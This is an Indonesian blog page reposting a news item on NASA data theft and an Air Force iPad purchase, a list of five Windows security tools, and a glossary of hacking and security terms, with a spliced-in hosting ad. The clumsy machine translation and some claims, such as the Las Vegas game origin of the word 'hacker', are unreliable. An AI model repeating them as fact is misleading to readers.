Dia menambahkan bahwa NASA bergerak terlalu lambat untuk mengenkripsi atau mengacak data pada laptop dan komputer untuk melindungi informasi penting di dalamnya agar tidak jatuh ke tangan yang salah.

Sementara, Juru Bicara NASA mengatakan kepada Reuters mengatakan bahwa pada hari Jumat, lembaga telah mengimplementasikan rekomendasi untuk pembuatan perlindungan jaringan oleh lembaga inspektur umum. “NASA menanggapi isu keamanan jaringan komputer ini dengan sangat serius, dan tidak ada yang dapat disampaikan saat operasi di stasiun luar angkasa internasional dalam keadaan bahaya karena adanya pencurian data,” ujar Michael Cabbagehe, juru bicara NASA.

Angkatan Udara Membatalkan Pembelian iPad

Angkatan Udara Amerika Serikat, pada Jumat lalu mengatakan bahwa pihaknya telah membatalkan rencana untuk ribuan paket untuk para anggotanya dengan fasilitas iPad komputer tablet generasi kedua dari perusahaan Apple, namun pihak Amerika membantah hal tersebut karena perangkat lunak ini juga diinginkan digunakan ke dalam jaringan mobile phone yang juga dikembangkan oleh Rusia.

Dua hari lalu, situs berita Nextgov menyatakan bahwa sekitar 2.861 iPad akan dilengkapi aplikasi GoodReader, yakni program dokumen elektronik yang dikembangkan oleh Rusia.

Perangkat ini dapat digunakan untuk menyimpan dan memperbarui informasi penerbangan, peraturan dan perintah, serta pengadaan dokumen lain.

WWW.SERVERINDONESIA.WEB.ID Pusat pembuatan website termurah, toko online hanya mulai 275rb (selama diskon tersedia, sudah termasuk domain dan hosting dan jasa designnya). kami juga ahli dalam reparasi laptop gagal servis. kontak order@ serverindonesia.web.id

“Pembatalan ini bukan kekhawatiran yang disebabkan oleh GoodReader,” ujar Matt Durham, juru bicara Komando Operasi Khusus Angkatan Udara Amerika Serikat.

Dia mengatakan pembatalan pada minggu ke-enam diikuti keputusan untuk pengadaan yang seharusnya tidak dibiarkan sebagai bisnis yang kecil.
Para anggota militer dan pemerintah telah menempatkan peningkatan untuk menguatkan ‘rantai keamanan’ dan memastikan bahwa perangkat keras, perangkat lunak dan semua komponen tidak dapat ‘dibobol’ oleh bangsa lain.
Hal ini sebagai tantangan karena begitu banyak komponen datang dari negera luar. Bahkan perusahaan-perusahaan Amerika sering mengajukan kontrak untuk program kerja dengan bangsa lain.

Mike Jacobs yang memimpin program keamanan nasional untuk perangkat di Amerika Serikat, mengatakan bahwa dia telah menggagalkan beberapa jaringan lunak yang terenkripsi dalam sebuah kode dalam hitungan detik setelah pemasok perangkat lunak untuk Amerika Serikat mempelajari beberapa kode kecil buatan Rusia

sumber: (http://mayoritas.com/showthread.php/157-berita-terbaru-dari-dunia-IT-dan-berita-terbaru-dari-NASA-Sebanyak-13-jaringan-utama-berhasil-ditembus-Bisa-membahayakan-keamanan-AS)

Dipublikasi di Uncategorized | Meninggalkan komentar

5 Tools Yang Terkait Dengan Keamanan Sistem

Sistem Keamanan adalah bagian penting dari komputer manapun dan bekerja seperti penjaga untuk komputer Anda. Untuk melindungi sistem Anda terhadap virus, spyware, dan software berbahaya lainnya, Anda harus mengambil langkah-langkah untuk mengamankan sistem yang sehat Anda dari semua jenis ancaman keamanan.

Internet adalah sumber utama dari virus seperti Trojan, Spam, phishing, dan banyak kegiatan lainnya aman. Anda bisa mendapatkan beberapa lapisan keamanan tambahan untuk PC Anda menggunakan program Antivirus yang baik tapi kadang-kadang Antivirus program juga gagal untuk melindungi sistem anda dari virus crash.

CCleaner

Ini adalah alat keamanan pertama dan terbaik freeware untuk pengguna Windows. Ini melindungi privasi online Anda dan membuat komputer Anda lebih cepat dan lebih aman. Tugas yang paling penting dari utilitas ini adalah bahwa hal itu dapat membersihkan semua jejak kaki pribadi dari sistem. Hal ini dapat menghapus file-file sementara, sejarah, cookie, download sejarah, sejarah bentuk dan data pribadi lainnya dengan satu klik. Tugas lanjutan lainnya dari utilitas ini termasuk membersihkan registry Jendela dengan menghapus semua entri registry yang tidak terpakai dan tua. Utilitas ini juga sangat baik di aman menghapus. Hal ini dapat menghapus semua data dari hard drive dengan cara yang aman sehingga tidak mungkin untuk pulih. Jadi saya ingin mengatakan bahwa CCleaner adalah alat yang paling penting jika Anda benar-benar serius tentang keamanan sistem Anda.

Ad-Aware

Ini adalah aplikasi lain freeware (juga tersedia dalam versi berbayar) yang memberikan perlindungan real time dari virus. Anda dapat menginstalnya sebagai program Anti-spyware yang melindungi komputer dengan cara yang berbeda. Versi freeware dari AD-Aware mendukung sejumlah fitur keamanan termasuk Game Mode, Safe Browsing, Scanning Direct, Perlindungan Download dan banyak fitur keamanan lainnya. Waktu perlindungan nyata yang ditawarkan oleh program ini melindungi Anda dan teman Anda saat pesan, chatting, atau berkomunikasi di situs jejaring sosial.

Microsoft Security Essentials

Ini adalah program keamanan gratis oleh Microsoft. Hal ini khusus dirancang untuk menjaga terhadap virus, spyware, dan software jahat lainnya. Tapi ingat, Anda dapat menginstal dan menggunakan produk ini pada Windows Anda hanya jika Anda memiliki produk Windows Asli. Setelah Anda menginstal itu, pembaruan perangkat lunak otomatis sekali sehari. Jadi Anda tidak perlu khawatir tentang update program dan ancaman keamanan lainnya setelah menginstal pada komputer. Anda akan mendapatkan peringatan hanya jika ada tindakan spesifik untuk mengambil selain itu berjalan pelan di latar belakang. Microsoft Security Essentials adalah kompak, mudah digunakan dan alat yang cukup mengesankan bahwa Anda harus mencoba sekali pada komputer Anda.

TrueCrypt

TrueCrypt memberikan keamanan canggih untuk pengguna komputer dengan mengenkripsi data hard drive. TrueCrypt adalah perangkat lunak untuk membangun dan mempertahankan volume on-the-fly-dienkripsi (perangkat penyimpanan data). On-the-fly enkripsi berarti bahwa semua data secara otomatis dienkripsi tepat sebelum disimpan dan didekripsi tepat setelah dimuat, tanpa campur tangan pengguna. Tidak ada yang dapat membaca data dari volume terenkripsi tanpa password yang benar atau kunci enkripsi. Menggunakan aplikasi freeware, Anda dapat mengenkripsi seluruh sistem file termasuk file / folder nama, isi dari setiap file, ruang bebas dari hard drive dan meta data informasi juga. Anda dapat menggunakan aplikasi keamanan untuk melindungi drive Windows dan mengatur keamanan pada Windows booting juga.

Glary Utilities

Glary Utilities adalah freeware dengan membersihkan registry dan disk, perlindungan privasi, akselerator kinerja dan alat multifungsi menakjubkan. Hal ini dapat memperbaiki kesalahan registri mantap, menyeka mengacaukan, mengoptimalkan kecepatan internet, mengamankan file rahasia dan mempertahankan kinerja maksimum. Ini adalah aplikasi user friendly dengan arah yang jelas dan rinci. Sebagian besar tugas dapat dilakukan dalam satu atau dua langkah. Ini memiliki lima kategori yang berbeda – Clean Up & Perbaikan, Optimalkan & Meningkatkan, Privasi & Keamanan, File & Folder dan System Tools sehingga membuat aplikasi ini sangat kuat. Versi berbayar aplikasi ini juga tersedia dan mendukung beberapa fitur yang lebih canggih.
Dipublikasi di Uncategorized | Meninggalkan komentar

Artikel Keamanan Jaringan

Sistem Jaringan Komputer : Sistem Keamanan Jaringan Komputer

Keamanan Komputer seperti yang dikatakan oleh John D. Howard, seorang Analisys Of Security Incidents On The Internet pada tahun 1989-1995, mengatkan bahwa : Computer Security is preventing attackers form achieving objectives through unathorized access or unauthorized use of computers & networks.

Jaringan internet bersifat publik. Sehingga memungkinkan arus informasi bisa disadap oleh pihak lain. Untuk itu keamanan menjadi useful terhadap kenyamanan jaringan komputer dan vulnerability suatu jaringan.
Adapun yang termasuk sistem keamanan komputer sebagai berikut “

  • Hacker

Asal pertama kata “Hacker” sendiri berawal dari sekitar thun 60-an di Las Vegas di adakan sebuah permainan (Game) yang menggunakan system jaringan komputer (networking) dimana cara permainan itu satu sama lain berusaha untuk masuk ke system komputer lawan (pemain lainya) dan melumpuhkannya. dari sinilah kemudian orang-orang menamakan sekelompok anak-anak muda yang mengikuti permainanan ini sebagai “Hackers” yaitu sekelompok anak-anak muda yang mampu menjebol dan melumpuhkan system komputer orang.

  • Cracker

Sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data dan umumnya melakukan cracking untuk keuntungan sendiri, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem.

  • White Hat

Istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.

  • Black Hat

Istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yaitu mereka yang menerobos keamanan sistem komputer tanpa ijin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut. Istilah cracker diajukan oleh Richard Stallman untuk mengacu kepada peretas dalam arti ini.

  • Script Kiddies

Tingkatan level yang paling rendah, Mereka hanya tahu tentang dasar bagaimana memodifikasi Script atau Program dengan mencari artikel pendukung di internet, forum maupun Youtube. Segala informasi mereka kumpulkan untuk mengubah script yang sudah ada dengan cara coba-coba. Kemampuan mereka dalam membuat atau merusak suatu program tergolong rendah.

  • Elite Hacker

Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistemoperasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.

  • Vulnerable

Sesuatu yang bertalian dengan sistem komputer yang memungkinkan seseorang mengoperasikan dan menjalankannya dengan benar, atau memungkinkan pihak tak berwenang (bisa hacker) mengambil alih. Ada banyak tipe vulnerability. Ada miskonfigurasi dalam setup service, atau flaw programming service.

  • Security Hole

Merupakan Celah dari keamanan system/ mesin Hal tersebut disebabkan karena adanya kelemahan-kelemahan di dalam konfigurasi suatu sistem (Configuration Vulnerabilities) dll,sehingga dimanfaatkan untuk menyusup ke dalam suatu jaringan komputer tanpa diketahui pengelolanya

  • Bug

sebuah kesalahan, error, kekurangan, atau kegagalan yang sering terjadi pada program komputer sehingga menghambat jalannya program sebagaimana mestinya
Exploit
perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.

  • Logical Bomb

merupakan program yang dimasukkan ke dalam suatu komputer yang bekerja untuk memeriksa kumpulan kondisi di dalam suatu sistem. Jika kondisi yang dimaksud terpenuhi, maka program akan mengeksekusi perintah yang ada di dalamnya. Program ini berjalan jika ada pemicu. Biasanya pemicunya adalah jika user menjalankan program tertentu atau menekan salah satu tombol keyboard.

  • Penetration Testing

Uji coba yang melakukan verifikasi dari mekanisme perlindungan yang dibuat oleh sistem/Pengujian Terhadap Kelemahan Sistem Informasi Perusahaan

sumber: (keamananinternet.tripod.com/keamananjaringan-komputer.html)

Dipublikasi di Uncategorized | Meninggalkan komentar